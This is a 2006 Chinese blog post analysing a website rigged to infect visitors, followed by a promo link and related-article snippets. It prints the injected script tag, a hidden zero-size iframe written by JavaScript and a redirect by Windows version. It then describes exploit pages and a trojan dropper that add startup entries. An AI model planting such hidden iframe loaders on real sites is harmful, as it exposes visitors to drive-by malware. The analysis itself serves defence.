关于hxxp //www hj234 com的问题
endurer 原创
2006-04-24 第1版
在hxxp://www.hj234.com的主页有代码:
<script language=JavaScript src="hxxp://www.***hj234.com/abc/abc.js"></script>
hxxp://www.***hj234.com/abc/abc.js的内容为:
document.write("<iframe height=0 width=0 frameborder=0 src='hxxp://www.***hj234.com/abc/joke.htm'></iframe>")
hxxp://www.***hj234.com/abc/joke.htm的内容为:
<center><font color=red>对不起,您访问的页面不存在!</font><center> <script language=javascript>ie='windows';ver=navigator.appVersion;if(!(ver.indexOf('NT 5.0')==-1))ie='winnt';if(!(ver.indexOf('Windows 98')==-1)){ie='w98';}location.href=ie+'.htm';</script>
会根据浏览者所用Windows版本,打开windows.htm,winnt.htm或w98.htm
从这个网页开始,所用的技术与发现一个使用技术升级、下载灰鸽子的网站相同。
这3个网页会下载/运行文件young.gif和young.css
young.gif 是个利用系统漏洞的网页文件,访问注册表获取IE临时文件夹路径,并利用WScript.Shell复制文件young.css,创建文件c:/wins.bat,c:/boot.hta,C:/wins.exe。
江民KV2006报为Exploit.VBS.Phel.ba
young.css 用VB6编写,修改IE启动页,创建名为services.exe的文件,并在注册表的run键加入开机启动项,江民KV2006报为TrojanDropper.Delf.d
再分享一下我老师大神的人工智能教程吧。零基础!通俗易懂!风趣幽默!还带黄段子!希望你也加入到我们人工智能的队伍中来!https://blog.csdn.net/jiangjunshow
关于hxxp //www hj234 com的问题相关推荐
- hxxp://www.hao923.com.cn/劫持浏览器
一位网友在国庆那天,为了在网上看阅兵式,从网上下载安装了一个软件,不料IE主页被劫持为hxxp://www.hao923.com.cn/,用超级巡警无法修复,请偶帮忙检修. 右击网友电脑桌面上的IE图 ...
- IE被hxxp://www.pp8000.cn劫持,卡卡报IE为可疑后门程序
IE被hxxp://www.pp8000.cn劫持,卡卡报IE为可疑后门程序 endurer 原创 2009-02-15 第1版 一位网友的电脑最近打开IE总是显示hxxp://www.pp8000. ...
- 抽象工厂模式AbstractFactory
简介 抽象工厂模式(Abstract Factory Pattern):提供一个创建一系列相关或相互依赖对象的接口,而无须指定它们具体的类.抽象工厂模式又称为Kit模式,属于对象创建型模式. 不同点 ...
- 一种新的攻击方式:使用Outlook 表单进行横向渗透和常驻
本文讲的是一种新的攻击方式:使用Outlook 表单进行横向渗透和常驻, 背景 最近我们针对CrowdStrike服务进行例行调查,发现了一种攻击方法,其主要用于横向渗透和系统常驻,而且是以前我们没有 ...
- 房子成焦点,被挂马的房产网站仍在增加中
统计发现,近期大部分使用极光漏洞挂马,这个漏洞实在是太好用了.没打补丁,没装网盾,按网马广告上说的,有不弹.不卡.不闪三大"优点",点击挂马网页会中招. 今天新增被挂马的知名房产网 ...
- 使用 Firefox攻击Web2.0应用(二)
三.Web2.0安全评估面临的挑战 在Web2.0这个异步的框架中,Web应用不再需要以前那么频繁的页面刷新和重定向,这样,一些原本能够被利用的服务器资源被隐藏了起来.以下是安全研究人员在理解Web2 ...
- 威胁预警|多个挖矿僵尸网络开始使用ThinkPHP v5漏洞 威胁升级
前言 12月10日ThinkPHP团队发布了版本更新,修复了一处远程命令执行漏洞,该漏洞是由于ThinkPHP框架对控制器没有进行严格的安全过滤,致使攻击者可以伪造恶意参数进行代码执行.12月11日阿 ...
- 69.2. wget - retrieves files from the web
setlocal ENABLEDELAYEDEXPANSION for /l %%i in (1001,1,1162) do for /l %%j in (101,1,112) do @(set s= ...
- 断网与黑客无关 我来抖一抖暴风那点见不得人的猫腻
这几天看新闻,发现暴风七搞八搞,居然包装成了5.19断网的受害者,听说实际上是暴风被ZF封杀,在新版本发布前,不准提供旧版本的下载,结果搞成了什么"召回".然后就是一帮弱智媒体跟着 ...
最新文章
- The ultimate end-to-end tutorial to create and deploy a fully decentralized Dapp in ethereum
- 鸿蒙关键技术研究,鸿蒙内核源码分析(静态链接篇) | 完整小项目看透静态链接过程 | 百篇博客分析HarmonyOS源码 | v54.02...
- 编译原理——实验叁预习报告——基于YACC的TINY语法分析器的构建
- C#操作 excel表格
- 京东一面:说出ThreadLocal的使用场景及使用方式
- 生成ltx文件命令_利用二次开发工具批量生成PCDMIS程序
- 为什么C# md5 32位加密算法,密码明文会出现31位
- 判断浏览器是IE的几种方式
- 腾讯云分布式高可靠消息队列CMQ架构最佳实践
- 2018-2019-1 20165214 《信息安全系统设计基础》第九周学习总结
- android-handler、looper、messageQueue、message
- 【并行计算-CUDA开发】CUDA shared memory bank 冲突
- linux 火狐打不开网页视频,Ubuntu下Firefox不能播放html视频的问题
- ceph 代码分析 读_Ceph代码分析
- 基于HTML5 Canvas实现炫酷钟表效果
- 固定光束扫描器行业研究及十四五规划分析报告
- mac每次执行mvn -v命令要先执行source ~/.bash_profile才生效
- CycleGAN中欺骗相反域的鉴别器是什么意思
- ios开发中常用的一些软件
- Three.js实现剖切